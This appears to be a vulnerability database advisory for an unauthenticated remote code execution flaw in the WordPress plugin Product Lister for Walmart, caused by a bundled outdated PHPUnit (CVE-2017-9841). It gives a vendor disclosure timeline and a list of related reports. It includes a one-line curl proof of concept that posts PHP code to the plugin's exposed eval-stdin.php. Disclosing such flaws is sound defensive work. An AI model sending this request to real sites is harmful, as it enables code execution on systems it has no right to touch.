Lucene search
WpvulndbWPEX-ID:7A1A014C-F840-4090-8F80-D692C2F17721HistoryMar 25, 2020 - 12:00 a.m.
Product Lister for Walmart <= 1.0.0 - Unauthenticated RCE via Outdated PHPUnit
2020-03-2500:00:00
wpvulndb
72
The plugin uses an outdated PHPUnit library, which is known to be affected by an unauthenticated RCE issue. February 28th, 2020 - Ticket sent to vendor via https://support.cedcommerce.com/open.php March 6th, 2020 - Update requested to vendor (also realised that the ticket was closed w/o reason given) March 12th, 2020 - Ticket closed again w/o explanation March 12th, 2020 - Issue escalated to WP plugins team March 18th, 2020 - WP Plugins Team investigating & plugin closed March 25th, 2020 - Disclosure
curl -X POST --data "<?php echo php_uname(); ?>" http://example.com/wp-content/plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpRelated
prion
prion
Code injection
2017-06-27 17:29:00
osv
osv
CVE-2017-9841
2017-06-27 17:29:00
PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841
2020-01-07 17:20:47
wpexploit
wpexploit
Multiple Plugins - Unauthenticated RCE via PHPUnit
2017-08-26 00:00:00
packetstorm
packetstorm
PHP Unit 4.8.28 Remote Code Execution
2022-02-02 00:00:00
openvas
openvas
PHPUnit 'CVE-2017-9841' RCE Vulnerability (HTTP) - Active Check
2018-04-14 00:00:00
Mageia: Security Advisory (MGASA-2017-0429)
2022-01-28 00:00:00
cisa_kev
cisa_kev
PHPUnit Command Injection Vulnerability
2022-02-15 00:00:00
nuclei
nuclei
PHPUnit - Remote Code Execution
2020-08-07 08:02:28
wpvulndb
wpvulndb
Multiple Plugins - Unauthenticated RCE via PHPUnit
2017-08-26 00:00:00
github
github
PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841
2020-01-07 17:20:47
qualysblog
qualysblog
Risk Fact #4: Malware in your Cloud means Exploitation is underway
2023-08-29 08:02:57
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
zdt
zdt
PHP Unit 4.8.28 - Remote Code Execution (Unauthenticated) Exploit
2022-02-02 00:00:00
checkpoint_advisories
checkpoint_advisories
PHPUnit Command Injection (CVE-2017-9841)
2019-11-04 00:00:00
thn
thn
AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials
2024-03-21 12:48:00
Kinsing Actors Exploiting Recent Linux Flaw to Breach Cloud Environments
2023-11-03 13:12:00
nessus
nessus
GLSA-201711-15 : PHPUnit: Remote code execution
2017-11-20 00:00:00
Drupal PHPUnit/Mailchimp Code Execution Vulnerability
2019-09-06 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2017-06-28 01:33:54
ubuntucve
ubuntucve
CVE-2017-9841
2017-06-27 00:00:00
impervablog
impervablog
CrimeOps of the KashmirBlack Botnet β Part I
2020-10-22 13:07:28
The Resurrection of PHPUnit RCE Vulnerability
2020-02-18 18:27:41
cve
cve
CVE-2017-9841
2017-06-27 17:29:00
hackerone
hackerone
8x8: Exposed PHP dependencies at ββ.8x8.com
2021-03-22 17:56:43
attackerkb
attackerkb
CVE-2017-9841
2017-06-27 00:00:00
friendsofphp
friendsofphp
RCE vulnerability in phpunit
2016-11-13 17:52:50
gentoo
gentoo
PHPUnit: Remote code execution
2017-11-19 00:00:00
debiancve
debiancve
CVE-2017-9841
2017-06-27 17:29:00
exploitdb
exploitdb
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
2022-02-02 00:00:00
threatpost
threatpost
Threatlist: Hackers Turn to Python as Attack Coding Language of Choice
2018-09-27 20:08:07
ics
ics
Known Indicators of Compromise Associated with Androxgh0st Malware
2024-01-16 12:00:00
mageia
mageia
Updated mediawiki packages fix security vulnerabilities
2017-11-29 21:52:42
freebsd
freebsd
mediawiki -- multiple vulnerabilities
2017-11-14 00:00:00
cisa
cisa
CISA Adds Nine Known Exploited Vulnerabilities to Catalog
2022-02-15 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - October 2021
2021-10-19 00:00:00
Related for WPEX-ID:7A1A014C-F840-4090-8F80-D692C2F17721